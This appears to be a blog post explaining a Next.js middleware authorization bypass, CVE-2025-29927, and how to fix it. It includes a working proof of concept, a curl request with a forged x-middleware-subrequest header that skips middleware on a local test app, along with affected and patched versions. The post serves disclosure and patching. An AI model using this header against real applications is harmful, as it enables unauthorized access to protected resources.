A few days ago, researchers disclosed a critical Next.js vulnerability (CVE-2025-29927), highlighting an authorization bypass in the framework’s middleware.
This can allow attackers to completely bypass middleware protections. In other words, if you used middleware.ts, your application is not secure.
Let me explain.
The Attack: How It Works
Next.js uses the x-middleware-subrequest header to track outgoing requests from middleware and prevent infinite loops. The header is added when middleware calls another service, such as an external API. This is designed to stop middleware from calling itself repeatedly, which could waste server resources.
However, an attacker can manipulate this header to make it appear like the middleware is calling itself repeatedly, bypassing the middleware protection. For example, if an attacker sends a header like this:
x-middleware-subrequest: src/middleware:src/middleware:src/middleware:src/middleware:src/middlewareThis will trick Next.js into thinking the middleware has already been called five times, allowing the attacker to skip the middleware logic and access protected resources.
Demonstrating the Exploit
Here’s a simple example of how the exploit works in Next.js v15.2.2. Imagine we have middleware that sets a custom header and a route that returns it:
export default function middleware(request: NextRequest) {
request.headers.set("x-my-custom-header", "Hello, world!");
return NextResponse.next({ request });
}Route (src/app/test/route.ts):
export default function GET(request: NextRequest) {
return NextResponse.json({
message: request.headers.get("x-my-custom-header") ?? "Middleware skipped. Exploited!"
});
}Normally, the route would return "Hello, world!" like this:
curl http://localhost:3000/test
# => { "message": "Hello, world!" }But if the attacker adds the malicious header, the middleware is bypassed, and the response changes:
curl -H "x-middleware-subrequest: src/middleware:src/middleware:src/middleware:src/middleware:src/middleware" http://localhost:3000/test
# => { "message": "Middleware skipped. Exploited!" }Are you affected?
If you use Next.js and rely on middleware for protecting pages, you may be affected by this vulnerability. Here’s how to tell if you are:
- You use Next.js and rely on middleware for authorization.
- You don’t have additional user authentication checks inside your pages or components.
- You’re not using Vercel or a platform that has patched the issue.
- Your Next.js version is older than
v14.2.25(Next.js 14) orv15.2.3(Next.js 15).
How to Fix It
- Update Next.js: Make sure you're using
v14.2.25orv15.2.3or later.
Read more on official Next.js blog here.
Final Thoughts
What are your thoughts on this? How could this have been prevented?
